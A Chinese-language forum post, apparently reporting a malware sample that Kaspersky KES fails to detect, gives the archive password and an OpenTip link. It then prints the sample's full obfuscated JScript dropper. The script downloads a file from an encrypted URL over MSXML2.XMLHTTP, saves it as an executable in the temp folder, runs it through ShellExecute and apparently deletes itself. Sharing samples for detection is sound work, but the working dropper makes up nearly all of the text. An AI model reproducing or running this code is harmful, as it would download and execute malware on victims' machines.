本帖最后由 megakotaro 于 2022-10-26 10:59 编辑
密碼:infected
KES無法偵測,opentip已經有報法
https://opentip.kaspersky.com/CA21396DF7EBA831EA17C98D2FDD4321A8B529BB1A103F9F5F0249F3F69D7494/results?tab=upload
js代碼如下
var _0x4f2af2=_0x3985,_0xcff520=_0x5904;(function(_0x173531,_0x11123b){var _0x57c5d6=_0x3985,_0x36b966=_0x5904,_0x2bd6c=_0x173531();while(!![]){try{var _0x5200a6=parseInt(_0x36b966(0xa7))/0x1*(parseInt(_0x57c5d6(0xa9,'wIWr'))/0x2)+parseInt(_0x36b966(0x95))/0x3+-parseInt(_0x57c5d6(0xa6,'qDqc'))/0x4+-parseInt(_0x36b966(0x94))/0x5+parseInt(_0x36b966(0x8b))/0x6*(-parseInt(_0x57c5d6(0x98,'GHD&'))/0x7)+-parseInt(_0x57c5d6(0xa4,')!Br'))/0x8+parseInt(_0x57c5d6(0xa0,'nL[q'))/0x9*(parseInt(_0x36b966(0x9a))/0xa);if(_0x5200a6===_0x11123b)break;else _0x2bd6c['push'](_0x2bd6c['shift']());}catch(_0x270f0d){_0x2bd6c['push'](_0x2bd6c['shift']());}}}(_0x56df,0x230e6));var pOut=new ActiveXObject('Scripting.FileSystemObject')['GetSpecialFolder'](0x2)+'\x5cNMXCJKHKDFDF.exe',Object=WScript[_0xcff520(0xa1)](_0xcff520(0x8f));function _0x5904(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x5904=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];return _0x51a412;},_0x5904(_0x9c84c,_0x17dd92);}Object[_0x4f2af2(0xaa,'TuLi')](_0x4f2af2(0x9c,'S[46'),_0x4f2af2(0x91,'z3a$'),![]),Object['Send']();function _0x3985(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x3985=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];if(_0x3985['ScXJZs']===undefined){var _0x48fb6a=function(_0x2fd867){var _0x471fd1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x5578d5='',_0x515abf='';for(var _0x3a4496=0x0,_0x380316,_0x4a0cc6,_0x5cb575=0x0;_0x4a0cc6=_0x2fd867['charAt'](_0x5cb575++);~_0x4a0cc6&&(_0x380316=_0x3a4496%0x4?_0x380316*0x40+_0x4a0cc6:_0x4a0cc6,_0x3a4496++%0x4)?_0x5578d5+=String['fromCharCode'](0xff&_0x380316>>(-0x2*_0x3a4496&0x6)):0x0){_0x4a0cc6=_0x471fd1['indexOf'](_0x4a0cc6);}for(var _0x39283c=0x0,_0x1bb641=_0x5578d5['length'];_0x39283c<_0x1bb641;_0x39283c++){_0x515abf+='%'+('00'+_0x5578d5['charCodeAt'](_0x39283c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x515abf);};var _0x3985da=function(_0x283da5,_0x2b0fa8){var _0x199236=[],_0x4ba68c=0x0,_0x4f0a58,_0x1a7710='';_0x283da5=_0x48fb6a(_0x283da5);var _0x1252df;for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x199236[_0x1252df]=_0x1252df;}for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df]+_0x2b0fa8['charCodeAt'](_0x1252df%_0x2b0fa8['length']))%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58;}_0x1252df=0x0,_0x4ba68c=0x0;for(var _0x2dfa7a=0x0;_0x2dfa7a<_0x283da5['length'];_0x2dfa7a++){_0x1252df=(_0x1252df+0x1)%0x100,_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df])%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58,_0x1a7710+=String['fromCharCode'](_0x283da5['charCodeAt'](_0x2dfa7a)^_0x199236[(_0x199236[_0x1252df]+_0x199236[_0x4ba68c])%0x100]);}return _0x1a7710;};_0x3985['rIGhVh']=_0x3985da,_0x9c84c=arguments,_0x3985['ScXJZs']=!![];}var _0x35bd58=_0x56df3f[0x0],_0x4aa8cc=_0x59043b+_0x35bd58,_0x5e6e2e=_0x9c84c[_0x4aa8cc];return!_0x5e6e2e?(_0x3985['ylfOpK']===undefined&&(_0x3985['ylfOpK']=!![]),_0x51a412=_0x3985['rIGhVh'](_0x51a412,_0x196c0a),_0x9c84c[_0x4aa8cc]=_0x51a412):_0x51a412=_0x5e6e2e,_0x51a412;},_0x3985(_0x9c84c,_0x17dd92);}function _0x56df(){var _0x5edb84=['W6jPqSoOWP7dKCoEoCkGpuSa','5317KmOPsx','W6f/EhCKoWqyAxGaW5GNW64','AmkKl8kSWR/dOb3cHau','j0DGxq','6ZNQDDn','WReGWQrlWQC','o8oIwmkuo8odsaZdHr4','ResponseBody','MSXML2.XMLHTTP','CmkfWOpcRmoJzCkHWQz0WRlcOmof','wSoTBvKHW6rJWRJdV8krESk+W4NcOcNdSCoPW4mJx8k8W7rwr8o9dCkcWPS7WR3cSIlcI8k0W7RdSCobgSo8W7m','Open','jtBcGs3dI8ouvfldVKrAWRW','224295AsaaII','171096WhivHY','Shell.Application','s8kpBvtdTmk7W5lcK0aMbgqW','WRfKgmoxmLuWu8kUWRWglq','WP9dW4/dOCkJovHuW77dLW','3860mnRLVl','ADODB.Stream','DmocW5G','102pIDUIi','W5jrWOBcKqLOtCklhSo+','Type','qCkKW7VcVrJdSSoQWQHEWRu','CreateObject','open','yCo6A0aIWQOLW7NdRCowsCo6W4tcSaddUCkVWPKYwCoCW7HsdCoqna','W4bxlCk/Cqygg8oEW77cQmo5wW','xmkAW7zIuGqU'];_0x56df=function(){return _0x5edb84;};return _0x56df();}var Stream=WScript[_0xcff520(0xa1)](_0xcff520(0x9b));Stream[_0xcff520(0x92)](),Stream[_0xcff520(0x9f)]=0x1,Stream[_0x4f2af2(0x8c,'kpbZ')](Object[_0xcff520(0x8e)]),Stream['Position']=0x0,Stream['SaveToFile'](pOut,0x2),Stream['Close'](),new ActiveXObject(_0xcff520(0x96))['ShellExecute'](pOut,'','',_0xcff520(0xa2),'1'),new ActiveXObject(_0x4f2af2(0xa3,'z3a$'))[_0x4f2af2(0x9e,'cxQS')](WScript[_0x4f2af2(0xa8,'YL!G')]); |